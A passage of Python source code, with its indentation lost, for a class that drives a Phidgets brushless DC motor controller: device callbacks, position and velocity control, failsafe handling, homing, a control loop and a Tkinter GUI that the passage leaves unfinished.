def TellWhichFileWereIn(self):
#We used to use this method, but it gave us the root calling file, not the class calling file
#absolute_file_path = os.path.dirname(os.path.realpath(sys.argv[0]))
#filename = absolute_file_path[absolute_file_path.rfind("\\") + 1:]
frame = inspect.stack()[1]
filename = frame[1][frame[1].rfind("\\") + 1:]
filename = filename.replace(".py","")
return filename
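#NOTE: the rfind("\\") above assumes Windows path separators. A minimal, hedged sketch of a cross-platform
#variant (standard library only; this is an assumption/illustration, not the behavior the class relies on):
#
#   import inspect, os
#   def TellWhichFileWereIn_Portable():
#       frame = inspect.stack()[1]
#       return os.path.splitext(os.path.basename(frame[1]))[0] #Strips directories and the ".py" extension on any OS.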
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def BLDConAttachCallback(self, HandlerSelf):
try:
##############################
self.BLDCobject.setDataInterval(self.UpdateDeltaT_ms)
self.MyPrint_WithoutLogFile("The device currently has DataInterval: " + str(self.BLDCobject.getDataInterval()))
##############################
##############################
self.BLDCobject.setRescaleFactor(self.RescaleFactor_MultipliesPhidgetsUnits_UserSet)
self.MyPrint_WithoutLogFile("The device currently has RescaleFactor: " + str(self.BLDCobject.getRescaleFactor()))
##############################
############################## Setting StallVelocity to 0 will turn off stall protection functionality
self.BLDCobject.setStallVelocity(self.VelocityStallLimit_PhidgetsUnits_UserSet)
self.MyPrint_WithoutLogFile("The device currently has StallVelocity: " + str(self.BLDCobject.getStallVelocity()))
##############################
##############################
self.Acceleration_PhidgetsUnits_TO_BE_SET = self.AccelerationMaxLimit_PhidgetsUnits_UserSet
self.Acceleration_PhidgetsUnits_NeedsToBeChangedFlag = 1
self.Acceleration_PhidgetsUnits_GUI_NeedsToBeChangedFlag = 0
##############################
##############################
if self.ControlMode == "velocity":
##############################
self.BLDCobject.setTargetBrakingStrength(self.BrakingStrengthLimit_VelControl_PhidgetsUnits_UserSet)
self.MyPrint_WithoutLogFile("The device currently has BrakingStrength: " + str(self.BLDCobject.getTargetBrakingStrength()))
##############################
##############################
if self.ThisIsFirstTimeEverAttachingFlag == 1:
self.Velocity_PhidgetsUnits_TO_BE_SET = 0.0
else:
self.Velocity_PhidgetsUnits_TO_BE_SET = self.Velocity_PhidgetsUnits_FromDevice #Stay wherever you were when you detached
self.Velocity_PhidgetsUnits_NeedsToBeChangedFlag = 1
self.Velocity_PhidgetsUnits_GUI_NeedsToBeChangedFlag = 1
##############################
##############################
##############################
elif self.ControlMode == "position":
##############################
self.BLDCobject.setKp(self.Kp_PosControl_Gain_UserSet)
self.MyPrint_WithoutLogFile("The device currently has Kp: " + str(self.BLDCobject.getKp()))
self.BLDCobject.setKi(self.Ki_PosControl_Gain_UserSet)
self.MyPrint_WithoutLogFile("The device currently has Ki: " + str(self.BLDCobject.getKi()))
self.BLDCobject.setKd(self.Kd_PosControl_Gain_UserSet)
self.MyPrint_WithoutLogFile("The device currently has Kd: " + str(self.BLDCobject.getKd()))
##############################
##############################
self.EngagedState_TO_BE_SET = 1
self.EngagedState_NeedsToBeChangedFlag = 1
##############################
##############################
if self.ThisIsFirstTimeEverAttachingFlag == 1:
self.Position_PhidgetsUnits_TO_BE_SET = 0.0
self.DeadBand_PosControl_PhidgetsUnits_TO_BE_SET = self.DeadBand_PosControl_PhidgetsUnits_UserSet
self.Velocity_PhidgetsUnits_TO_BE_SET = self.VelocityMaxLimit_PhidgetsUnits_UserSet
else:
self.Position_PhidgetsUnits_TO_BE_SET = self.Position_PhidgetsUnits_FromDevice #Stay wherever you were when you detached
self.DeadBand_PosControl_PhidgetsUnits_TO_BE_SET = self.DeadBand_PosControl_PhidgetsUnits_FromDevice
self.Velocity_PhidgetsUnits_TO_BE_SET = self.VelocityMaxLimit_PhidgetsUnits_UserSet
self.Position_PhidgetsUnits_NeedsToBeChangedFlag = 1
self.Position_PhidgetsUnits_GUI_NeedsToBeChangedFlag = 1
self.Velocity_PhidgetsUnits_NeedsToBeChangedFlag = 1
self.Velocity_PhidgetsUnits_GUI_NeedsToBeChangedFlag = 1
self.DeadBand_PosControl_PhidgetsUnits_NeedsToBeChangedFlag = 1
self.DeadBand_PosControl_PhidgetsUnits_GUI_NeedsToBeChangedFlag = 1
##############################
##############################
##############################
if self.ThisIsFirstTimeEverAttachingFlag == 1: #Clear the flag after the first-ever attach so that later re-attaches restore the pre-detach state above.
self.ThisIsFirstTimeEverAttachingFlag = 0
##############################
self.device_connected_flag = 1
self.MyPrint_WithoutLogFile("$$$$$$$$$$ BLDConAttachCallback Attached Event! $$$$$$$$$$")
except PhidgetException as e:
self.device_connected_flag = 0
self.MyPrint_WithoutLogFile("BLDConAttachCallback ERROR: Failed to initialize the BLDC, Phidget Exception %i: %s" % (e.code, e.details))
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def BLDConDetachCallback(self, HandlerSelf):
self.device_connected_flag = 0
self.MyPrint_WithoutLogFile("$$$$$$$$$$ BLDConDetachCallback Detached Event! $$$$$$$$$$")
try:
self.BLDCobject.openWaitForAttachment(self.WaitForAttached_TimeoutDuration_Milliseconds)
time.sleep(0.250)
except PhidgetException as e:
self.MyPrint_WithoutLogFile("BLDConDetachCallback failed to waitForAttach, Phidget Exception %i: %s" % (e.code, e.details))
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def BLDConVelocityUpdateCallback(self, HandlerSelf, VelocityUpdatedValue):
self.Velocity_PhidgetsUnits_FromDevice = VelocityUpdatedValue
#self.MyPrint_WithoutLogFile("BLDConVelocityUpdateCallback event: self.Velocity_PhidgetsUnits_FromDevice = " + str(self.Velocity_PhidgetsUnits_FromDevice))
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def BLDConPositionChangeCallback(self, HandlerSelf, PositionChangedValue):
self.Position_PhidgetsUnits_FromDevice = PositionChangedValue
self.CurrentTime_OnPositionChangeCallbackFunction = self.getPreciseSecondsTimeStampString()
self.UpdateFrequencyCalculation_OnPositionChangeCallbackFunction()
self.Velocity_PhidgetsUnits_DifferentiatedRaw = (self.Position_PhidgetsUnits_FromDevice - self.Position_PhidgetsUnits_FromDevice_Last)/(self.DataStreamingDeltaT_OnPositionChangeCallbackFunction)
self.Velocity_PhidgetsUnits_DifferentiatedSmoothed = self.Velocity_LowPassFilter_ReubenPython2and3ClassObject.AddDataPointFromExternalProgram(self.Velocity_PhidgetsUnits_DifferentiatedRaw)["SignalOutSmoothed"]
self.Position_PhidgetsUnits_FromDevice_Last = self.Position_PhidgetsUnits_FromDevice
#self.MyPrint_WithoutLogFile("BLDConPositionChangeCallback event: self.Position_PhidgetsUnits_FromDevice = " + str(self.Position_PhidgetsUnits_FromDevice))
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def BLDConDutyCycleUpdateCallback(self, HandlerSelf, DutyCycleUpdatedValue):
self.DutyCycle_PhidgetsUnits_FromDevice = DutyCycleUpdatedValue
#self.MyPrint_WithoutLogFile("BLDConDutyCycleUpdateCallback event: self.DutyCycle_PhidgetsUnits_FromDevice = " + str(self.DutyCycle_PhidgetsUnits_FromDevice))
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def BLDConErrorCallback(self, HandlerSelf, code, description):
self.MyPrint_WithoutLogFile("----------")
self.MyPrint_WithoutLogFile("BLDConErrorCallback Code: " + ErrorEventCode.getName(code) + ", Description: " + str(description))
self.MyPrint_WithoutLogFile("----------")
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def TemperatureOnAttachCallback(self, HandlerSelf):
self.MyPrint_WithoutLogFile("$$$$$$$$$$ TemperatureOnAttachCallback Attached Event! $$$$$$$$$$")
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def TemperatureOnDetachCallback(self, HandlerSelf):
self.MyPrint_WithoutLogFile("$$$$$$$$$$ TemperatureOnDetachCallback Detached Event! $$$$$$$$$$")
try:
self.TemperatureObject.openWaitForAttachment(self.WaitForAttached_TimeoutDuration_Milliseconds)
time.sleep(0.250)
except PhidgetException as e:
self.MyPrint_WithoutLogFile("TemperatureOnDetachCallback failed to waitForAttach, Phidget Exception %i: %s" % (e.code, e.details))
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def TemperatureOnChangeCallback(self, HandlerSelf, TemperatureChangedValue):
self.Temperature_DegC_FromDevice = TemperatureChangedValue
#self.MyPrint_WithoutLogFile("TemperatureOnChangeCallback event: self.Temperature_DegC_FromDevice = " + str(self.Temperature_DegC_FromDevice))
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def TemperatureOnErrorCallback(self, HandlerSelf, code, description):
self.MyPrint_WithoutLogFile("----------")
self.MyPrint_WithoutLogFile("TemperatureOnErrorCallback Code: " + ErrorEventCode.getName(code) + ", Description: " + str(description))
self.MyPrint_WithoutLogFile("----------")
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def getTimeStampString(self):
ts = time.time()
st = datetime.datetime.fromtimestamp(ts).strftime('date-%m-%d-%Y---time-%H-%M-%S')
return st
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def getPreciseSecondsTimeStampString(self):
ts = time.time()
return ts
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def UpdateFrequencyCalculation_MainThread(self):
try:
self.DataStreamingDeltaT_CalculatedFromMainThread = self.CurrentTime_CalculatedFromMainThread - self.LastTime_CalculatedFromMainThread
if self.DataStreamingDeltaT_CalculatedFromMainThread != 0.0:
self.DataStreamingFrequency_CalculatedFromMainThread = 1.0/self.DataStreamingDeltaT_CalculatedFromMainThread
self.LastTime_CalculatedFromMainThread = self.CurrentTime_CalculatedFromMainThread
except:
exceptions = sys.exc_info()[0]
print("UpdateFrequencyCalculation_MainThread ERROR with Exceptions: %s" % exceptions)
traceback.print_exc()
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def UpdateFrequencyCalculation_OnPositionChangeCallbackFunction(self):
try:
self.DataStreamingDeltaT_OnPositionChangeCallbackFunction = self.CurrentTime_OnPositionChangeCallbackFunction - self.LastTime_OnPositionChangeCallbackFunction
if self.DataStreamingDeltaT_OnPositionChangeCallbackFunction != 0.0:
self.DataStreamingFrequency_OnPositionChangeCallbackFunction = 1.0/self.DataStreamingDeltaT_OnPositionChangeCallbackFunction
self.LastTime_OnPositionChangeCallbackFunction = self.CurrentTime_OnPositionChangeCallbackFunction
except:
exceptions = sys.exc_info()[0]
print("UpdateFrequencyCalculation_OnPositionChangeCallbackFunction ERROR with Exceptions: %s" % exceptions)
traceback.print_exc()
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def CommandMotorFromExternalProgram_PositionControl(self, commanded_position_PhidgetsUnits, commanded_velocity_limit_PhidgetsUnits = -11111.0):
######################
if self.ACCEPT_EXTERNAL_POSITION_COMMANDS_FLAG == 0:
self.MyPrint_WithoutLogFile("CommandMotorFromExternalProgram ERROR: ACCEPT_EXTERNAL_POSITION_COMMANDS_FLAG = 0")
return 0
######################
######################
if self.ControlMode != "position":
self.MyPrint_WithoutLogFile("CommandMotorFromExternalProgram ERROR: self.ControlMode must be 'position'")
return 0
######################
######################
self.Position_PhidgetsUnits_TO_BE_SET = self.limitNumber(self.PositionMinLimit_PhidgetsUnits_UserSet, self.PositionMaxLimit_PhidgetsUnits_UserSet, commanded_position_PhidgetsUnits)
self.Position_PhidgetsUnits_NeedsToBeChangedFlag = 1
self.Position_PhidgetsUnits_GUI_NeedsToBeChangedFlag = 1
######################
######################
if commanded_velocity_limit_PhidgetsUnits != -11111.0:
if commanded_velocity_limit_PhidgetsUnits != self.Velocity_PhidgetsUnits_TO_BE_SET:
self.Velocity_PhidgetsUnits_TO_BE_SET = self.limitNumber(self.VelocityMinLimit_PhidgetsUnits_UserSet, self.VelocityMaxLimit_PhidgetsUnits_UserSet, commanded_velocity_limit_PhidgetsUnits)
self.Velocity_PhidgetsUnits_NeedsToBeChangedFlag = 1
self.Velocity_PhidgetsUnits_GUI_NeedsToBeChangedFlag = 1
######################
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def CommandMotorFromExternalProgram_VelocityControl(self, commanded_velocity_PhidgetsUnits):
######################
if self.ACCEPT_EXTERNAL_POSITION_COMMANDS_FLAG == 0:
self.MyPrint_WithoutLogFile("CommandMotorFromExternalProgram ERROR: ACCEPT_EXTERNAL_POSITION_COMMANDS_FLAG = 0")
return 0
######################
######################
if self.ControlMode != "velocity":
self.MyPrint_WithoutLogFile("CommandMotorFromExternalProgram ERROR: self.ControlMode must be 'velocity'")
return 0
######################
######################
self.Velocity_PhidgetsUnits_TO_BE_SET = self.limitNumber(self.VelocityMinLimit_PhidgetsUnits_UserSet, self.VelocityMaxLimit_PhidgetsUnits_UserSet, commanded_velocity_PhidgetsUnits)
self.Velocity_PhidgetsUnits_NeedsToBeChangedFlag = 1
self.Velocity_PhidgetsUnits_GUI_NeedsToBeChangedFlag = 1
######################
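#A hedged usage sketch for the two command methods above (BLDC is an assumed, already-constructed instance of
#this class; the numeric values are illustrative only):
#
#   if BLDC.ControlMode == "position":
#       BLDC.CommandMotorFromExternalProgram_PositionControl(90.0, commanded_velocity_limit_PhidgetsUnits=45.0)
#   elif BLDC.ControlMode == "velocity":
#       BLDC.CommandMotorFromExternalProgram_VelocityControl(10.0)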
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def StopMotor(self):
if self.ControlMode == "velocity":
self.Velocity_PhidgetsUnits_TO_BE_SET = 0
self.Velocity_PhidgetsUnits_NeedsToBeChangedFlag = 1
self.Velocity_PhidgetsUnits_GUI_NeedsToBeChangedFlag = 1
elif self.ControlMode == "position":
self.EngagedState_TO_BE_SET = 0
self.EngagedState_NeedsToBeChangedFlag = 1
self.MyPrint_WithoutLogFile("StopMotor function called!")
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def SetPositionOffsetOnBoardWithoutMoving(self, commanded_position_offset_value_PhidgetsUnits):
commanded_position_offset_value_PhidgetsUnits_LIMITED = self.limitNumber(self.PositionMinLimit_PhidgetsUnits_UserSet, self.PositionMaxLimit_PhidgetsUnits_UserSet, commanded_position_offset_value_PhidgetsUnits)
try:
self.BLDCobject.addPositionOffset(commanded_position_offset_value_PhidgetsUnits_LIMITED)
self.MyPrint_WithoutLogFile("SetPositionOffsetOnBoardWithoutMoving issued addPositionOffset for value of " + str(commanded_position_offset_value_PhidgetsUnits_LIMITED))
return 1
except PhidgetException as e:
self.MyPrint_WithoutLogFile("SetPositionOffsetOnBoardWithoutMoving ERROR, Phidget Exception %i: %s" % (e.code, e.details))
return 0
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def HomeMotorInPlace(self):
Position_PhidgetsUnits_FromDevice_JUST_QUERIED = self.BLDCobject.getPosition()
self.MyPrint_WithoutLogFile("HomeMotorInPlace Position_PhidgetsUnits_FromDevice_JUST_QUERIED BEFORE adding offset: " + str(Position_PhidgetsUnits_FromDevice_JUST_QUERIED))
self.BLDCobject.addPositionOffset(-1.0*Position_PhidgetsUnits_FromDevice_JUST_QUERIED) #MUST HAVE THE MINUS SIGN, OR ELSE THE OFFSET DOESN'T SET IT TO ZERO (e.g., if getPosition() returns 123.4, addPositionOffset(-123.4) makes subsequent reads ~0.0).
Position_PhidgetsUnits_FromDevice_JUST_QUERIED = self.BLDCobject.getPosition()
self.MyPrint_WithoutLogFile("HomeMotorInPlace Position_PhidgetsUnits_FromDevice_JUST_QUERIED AFTER adding offset: " + str(Position_PhidgetsUnits_FromDevice_JUST_QUERIED))
if self.ControlMode == "position":
for counter in range(0, 4): #SEND COMMAND MULTIPLE TIMES TO MAKE SURE THAT IT TAKES!
self.Position_PhidgetsUnits_TO_BE_SET = 0.0
self.Position_PhidgetsUnits_NeedsToBeChangedFlag = 1
self.Position_PhidgetsUnits_GUI_NeedsToBeChangedFlag = 1
time.sleep(0.005)
self.MyPrint_WithoutLogFile("----- HomeMotorInPlace just performed! -----")
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def MainThread(self):
self.MyPrint_WithoutLogFile("Started MainThread for PhidgetBrushlessDCmotorDCC1100controller_ReubenPython2and3Class.")
self.MainThread_still_running_flag = 1
self.ACCEPT_EXTERNAL_POSITION_COMMANDS_FLAG = 1
self.BLDCobject.enableFailsafe(self.FailsafeTime_Milliseconds)
self.StartingTime_CalculatedFromMainThread = self.getPreciseSecondsTimeStampString()
###############################################
while self.EXIT_PROGRAM_FLAG == 0:
###############################################
self.CurrentTime_CalculatedFromMainThread = self.getPreciseSecondsTimeStampString() - self.StartingTime_CalculatedFromMainThread
###############################################
###############################################
if self.CurrentTime_CalculatedFromMainThread - self.LastTime_FailsafeWasReset >= 0.5*self.FailsafeTime_Milliseconds/1000.0: #IF YOU CALL resetFailsafe every PID loop, it'll kill your loop frequency
#self.MyPrint_WithoutLogFile("RESET FAILSAFE AT TIME = " + str(self.CurrentTime_CalculatedFromMainThread))
self.BLDCobject.resetFailsafe() #resetFailsafe is faster than enableFailsafe
self.LastTime_FailsafeWasReset = self.CurrentTime_CalculatedFromMainThread
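#Worked example of the reset cadence above: with FailsafeTime_Milliseconds = 500, the failsafe is re-armed
#whenever 0.5*500/1000 = 0.25 s have elapsed since the last reset, i.e., at half the failsafe timeout.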
###############################################
###############################################
############################################### Start SETs
###############################################
if self.StopMotor_NeedsToBeChangedFlag == 1:
self.StopMotor()
self.StopMotor_NeedsToBeChangedFlag = 0
###############################################
###############################################
if self.HomeMotorInPlace_NeedsToBeHomedFlag == 1:
self.HomeMotorInPlace()
self.HomeMotorInPlace_NeedsToBeHomedFlag = 0
###############################################
###############################################
if self.EngagedState_NeedsToBeChangedFlag == 1 and self.ControlMode == "position":
try:
#self.MyPrint_WithoutLogFile("Sending Engaged State to the Phidget.")
self.BLDCobject.setEngaged(self.EngagedState_TO_BE_SET)
if self.BLDCobject.getEngaged() == 1:
self.EngagedState_NeedsToBeChangedFlag = 0
except:
self.MyPrint_WithoutLogFile("ERROR: Failed to change EngagedState!")
###############################################
############################################### Tx portion
if self.Position_PhidgetsUnits_NeedsToBeChangedFlag == 1 and self.ControlMode == "position":
try:
#self.MyPrint_WithoutLogFile("Sending Position to the Phidget, value of " + str(self.Position_PhidgetsUnits_TO_BE_SET))
self.Position_PhidgetsUnits_TO_BE_SET = self.limitNumber(self.PositionMinLimit_PhidgetsUnits_UserSet, self.PositionMaxLimit_PhidgetsUnits_UserSet, self.Position_PhidgetsUnits_TO_BE_SET)
self.BLDCobject.setTargetPosition(float(self.Position_PhidgetsUnits_TO_BE_SET))
self.Position_PhidgetsUnits_NeedsToBeChangedFlag = 0
except PhidgetException as e:
self.MyPrint_WithoutLogFile("Failed setTargetPosition, Phidget Exception %i: %s" % (e.code, e.details))
###############################################
###############################################
if self.Velocity_PhidgetsUnits_NeedsToBeChangedFlag == 1:
try:
#self.MyPrint_WithoutLogFile("Sending Velocity to the Phidget.")
self.Velocity_PhidgetsUnits_TO_BE_SET = self.limitNumber(self.VelocityMinLimit_PhidgetsUnits_UserSet, self.VelocityMaxLimit_PhidgetsUnits_UserSet, self.Velocity_PhidgetsUnits_TO_BE_SET)
if self.ControlMode == "position":
self.BLDCobject.setVelocityLimit(float(self.Velocity_PhidgetsUnits_TO_BE_SET))
elif self.ControlMode == "velocity":
self.BLDCobject.setTargetVelocity(float(self.Velocity_PhidgetsUnits_TO_BE_SET))
self.Velocity_PhidgetsUnits_NeedsToBeChangedFlag = 0
except PhidgetException as e:
self.MyPrint_WithoutLogFile("Failed setVelocityLimit, Phidget Exception %i: %s" % (e.code, e.details))
###############################################
###############################################
if self.Acceleration_PhidgetsUnits_NeedsToBeChangedFlag == 1:
try:
#self.MyPrint_WithoutLogFile("Sending Acceleration to the Phidget.")
self.Acceleration_PhidgetsUnits_TO_BE_SET = self.limitNumber(self.AccelerationMinLimit_PhidgetsUnits_FromDevice, self.AccelerationMaxLimit_PhidgetsUnits_FromDevice, self.Acceleration_PhidgetsUnits_TO_BE_SET)
self.BLDCobject.setAcceleration(float(self.Acceleration_PhidgetsUnits_TO_BE_SET))
self.Acceleration_PhidgetsUnits_NeedsToBeChangedFlag = 0
except PhidgetException as e:
self.MyPrint_WithoutLogFile("Failed setAcceleration, Phidget Exception %i: %s" % (e.code, e.details))
###############################################
###############################################
if self.DeadBand_PosControl_PhidgetsUnits_NeedsToBeChangedFlag == 1 and self.ControlMode == "position":
try:
self.MyPrint_WithoutLogFile("Sending DeadBand to the Phidget, value = " + str(self.DeadBand_PosControl_PhidgetsUnits_TO_BE_SET))
self.DeadBand_PosControl_PhidgetsUnits_TO_BE_SET = self.limitNumber(0, self.PositionMaxLimit_PhidgetsUnits_UserSet, self.DeadBand_PosControl_PhidgetsUnits_TO_BE_SET) #Limit to max position since DeadBand is in position units
self.BLDCobject.setDeadBand(float(self.DeadBand_PosControl_PhidgetsUnits_TO_BE_SET))
#time.sleep(0.001)
self.DeadBand_PosControl_PhidgetsUnits_FromDevice = self.BLDCobject.getDeadBand()
#print("self.DeadBand_PosControl_PhidgetsUnits_TO_BE_SET: " + str(self.DeadBand_PosControl_PhidgetsUnits_TO_BE_SET))
if self.DeadBand_PosControl_PhidgetsUnits_FromDevice == self.DeadBand_PosControl_PhidgetsUnits_TO_BE_SET:
self.DeadBand_PosControl_PhidgetsUnits_NeedsToBeChangedFlag = 0
except PhidgetException as e:
self.MyPrint_WithoutLogFile("Failed setTargetDeadBand, Phidget Exception %i: %s" % (e.code, e.details))
###############################################
###############################################
############################################### End SETs
###############################################
############################################### Start GETs
if self.ControlMode == "position":
self.EngagedState_PhidgetsUnits_FromDevice = self.BLDCobject.getEngaged() #NOT INCLUDING UNDER ENABLE_GETS_MAINTHREAD BECAUSE THIS IS CRITICAL TO FUNCTIONALITY
if self.ENABLE_GETS_MAINTHREAD == 1:
self.VelocityStall_PhidgetsUnits_FromDevice = self.BLDCobject.getStallVelocity()
self.Acceleration_PhidgetsUnits_FromDevice = self.BLDCobject.getAcceleration()
if self.ControlMode == "position":
self.DeadBand_PosControl_PhidgetsUnits_FromDevice = self.BLDCobject.getDeadBand()
#print(self.DeadBand_PosControl_PhidgetsUnits_FromDevice)
###############################################
############################################### End GETs
###############################################
self.MostRecentDataDict = dict([("Position_PhidgetsUnits_FromDevice", self.Position_PhidgetsUnits_FromDevice),
("Velocity_PhidgetsUnits_FromDevice", self.Velocity_PhidgetsUnits_FromDevice),
("Velocity_PhidgetsUnits_DifferentiatedRaw", self.Velocity_PhidgetsUnits_DifferentiatedRaw),
("Velocity_PhidgetsUnits_DifferentiatedSmoothed", self.Velocity_PhidgetsUnits_DifferentiatedSmoothed),
("DutyCycle_PhidgetsUnits_FromDevice", self.DutyCycle_PhidgetsUnits_FromDevice),
("Temperature_DegC_FromDevice", self.Temperature_DegC_FromDevice),
("Time", self.CurrentTime_CalculatedFromMainThread)])
###############################################
############################################### USE THE TIME.SLEEP() TO SET THE LOOP FREQUENCY
###############################################
###############################################
self.UpdateFrequencyCalculation_MainThread()
if self.MainThread_TimeToSleepEachLoop > 0.0:
time.sleep(self.MainThread_TimeToSleepEachLoop)
###############################################
###############################################
###############################################
###############################################
self.MyPrint_WithoutLogFile("Finished the MainThread for PhidgetBrushlessDCmotorDCC1100controller_ReubenPython2and3Class object.")
self.MainThread_still_running_flag = 0
return 0
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def GetMostRecentDataDict(self):
return self.MostRecentDataDict
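#A hedged polling sketch for an external program (BLDC is an assumed, already-constructed instance of this
#class; the 50 ms period is illustrative, not required by the class):
#
#   import time
#   while True:
#       DataDict = BLDC.GetMostRecentDataDict()
#       print(DataDict["Position_PhidgetsUnits_FromDevice"], DataDict["Velocity_PhidgetsUnits_DifferentiatedSmoothed"])
#       time.sleep(0.050)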
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def ExitProgram_Callback(self):
print("Exiting all threads for Phidgets4EncoderAndDInput1047_ReubenPython2and3Class object")
self.EXIT_PROGRAM_FLAG = 1
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def StartGUI(self, GuiParent=None):
GUI_Thread_ThreadingObject = threading.Thread(target=self.GUI_Thread, args=(GuiParent,))
GUI_Thread_ThreadingObject.daemon = True #Daemon thread: the GUI thread is destroyed automatically when the main thread exits. (setDaemon() is deprecated in newer Python 3.)
GUI_Thread_ThreadingObject.start()
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def GUI_Thread(self, parent=None):
print("Starting the GUI_Thread for PhidgetBrushlessDCmotorDCC1100controller_ReubenPython2and3Class object.")
###################################################
if parent is None: #This class object owns root and must handle it properly
self.root = Tk()
self.parent = self.root
################################################### SET THE DEFAULT FONT FOR ALL WIDGETS CREATED AFTER/BELOW THIS CALL
default_font = tkFont.nametofont("TkDefaultFont")
default_font.configure(size=8)
self.root.option_add("*Font", default_font)
###################################################
else:
self.root = parent
self.parent = parent
###################################################
###################################################
self.myFrame = Frame(self.root)
if self.UseBorderAroundThisGuiObjectFlag == 1:
self.myFrame["borderwidth"] = 2
self.myFrame["relief"] = "ridge"
self.myFrame.grid(row = self.GUI_ROW,
column = self.GUI_COLUMN,
padx = self.GUI_PADX,
pady = self.GUI_PADY,
rowspan = self.GUI_ROWSPAN,
columnspan= self.GUI_COLUMNSPAN)
###################################################
###################################################
self.TKinter_LightGreenColor = '#%02x%02x%02x' % (150, 255, 150) #RGB
self.TKinter_LightRedColor = '#%02x%02x%02x' % (255, 150, 150) #RGB
self.TKinter_LightYellowColor = '#%02x%02x%02x' % (255, 255, 150) # RGB
self.TKinter_DefaultGrayColor = '#%02x%02x%02x' % (240, 240, 240) # RGB
self.TkinterScaleWidth = 10
self.TkinterScaleLength = 250
###################################################
###################################################
self.device_info_label = Label(self.myFrame, text="Device Info", width=75)
self.device_info_label["text"] = self.NameToDisplay_UserSet + \
"\nDevice Name: " + self.DetectedDeviceName + \
"\nVINT SerialNumber: " + str(self.VINT_DetectedSerialNumber) + \
"\nDeviceID: " + str(self.DetectedDeviceID) + \
"\nFW Ver: " + str(self.DetectedDeviceVersion) + \
"\nLibrary Ver: " + str(self.DetectedDeviceLibraryVersion)
self.device_info_label.grid(row=0, column=0, padx=1, pady=1, columnspan=1, rowspan=1)
###################################################
###################################################
self.data_label = Label(self.myFrame, text="Data Info", width=75)
self.data_label.grid(row=1, column=0, padx=1, pady=1, columnspan=1, rowspan=1)
###################################################
########################
self.PrintToGui_Label = Label(self.myFrame, text="PrintToGui_Label", width=75)
if self.EnableInternal_MyPrint_Flag == 1:
self.PrintToGui_Label.grid(row=2, column=0, padx=1, pady=1, columnspan=1, rowspan=10)
########################
#################################################
self.Position_PhidgetsUnits_ScaleLabel = Label(self.myFrame, text="Position", width=20)
self.Position_PhidgetsUnits_ScaleLabel.grid(row=1, column=1, padx=1, pady=1, columnspan=1, rowspan=1)
self.Position_PhidgetsUnits_ScaleValue = DoubleVar()
self.Position_PhidgetsUnits_Scale = Scale(self.myFrame, \
from_=self.PositionMinLimit_PhidgetsUnits_UserSet,\
to= self.PositionMaxLimit_PhidgetsUnits_UserSet,\
#tickinterval=(self.Position_PhidgetsUnits_max - self.Position_PhidgetsUnits_min) / 2.0,\
orient=HORIZONTAL,\
borderwidth=2,\
showvalue=1,\
width=self.TkinterScaleWidth,\
length=self.TkinterScaleLength,\
resolution=0.1,\
variable=self.Position_PhidgetsUnits_ScaleValue)
self.Position_PhidgetsUnits_Scale.bind('<Button-1>', lambda event, name="Position": self.Position_PhidgetsUnits_ScaleResponse(event, name)) #Use both '<Button-1>' or '<ButtonRelease-1>'
self.Position_PhidgetsUnits_Scale.bind('<B1-Motion>', lambda event, name="Position": self.Position_PhidgetsUnits_ScaleResponse(event, name))
self.Position_PhidgetsUnits_Scale.bind('<ButtonRelease-1>', lambda event, name="Position": self.Position_PhidgetsUnits_ScaleResponse(event, name)) #Use both '<Button-1>' or '<ButtonRelease-1>'
self.Position_PhidgetsUnits_Scale.set(self.Position_PhidgetsUnits_TO_BE_SET)
self.Position_PhidgetsUnits_Scale.grid(row=1, column=2, padx=1, pady=1, columnspan=2, rowspan=1)
if self.ControlMode == "velocity":
self.Position_PhidgetsUnits_Scale["state"] = "disabled"
#################################################
#################################################
self.Velocity_PhidgetsUnits_ScaleLabel = Label(self.myFrame, text="Velocity", width=20)
self.Velocity_PhidgetsUnits_ScaleLabel.grid(row=2, column=1, padx=1, pady=1, columnspan=1, rowspan=1)
self.Velocity_PhidgetsUnits_ScaleValue = DoubleVar()
self.Velocity_PhidgetsUnits_Scale = Scale(self.myFrame, \
from_=self.VelocityMinLimit_PhidgetsUnits_UserSet,\
to=self.VelocityMaxLimit_PhidgetsUnits_UserSet, \
#tickinterval=(self.Velocity_PhidgetsUnits_max - self.Velocity_PhidgetsUnits_min) / 2.0,\
orient=HORIZONTAL,\
borderwidth=2,\
showvalue=1,\
width=self.TkinterScaleWidth,\
length=self.TkinterScaleLength,\
resolution=0.001,\
variable=self.Velocity_PhidgetsUnits_ScaleValue)
self.Velocity_PhidgetsUnits_Scale.bind('<Button-1>', lambda event, name="Velocity": self.Velocity_PhidgetsUnits_ScaleResponse(event, name)) #Use both '<Button-1>' or '<ButtonRelease-1>'
self.Velocity_PhidgetsUnits_Scale.bind('<B1-Motion>', lambda event, name="Velocity": self.Velocity_PhidgetsUnits_ScaleResponse(event, name))
self.Velocity_PhidgetsUnits_Scale.bind('<ButtonRelease-1>', lambda event, name="Velocity": self.Velocity_PhidgetsUnits_ScaleResponse(event, name)) #Use both '<Button-1>' or '<ButtonRelease-1>'
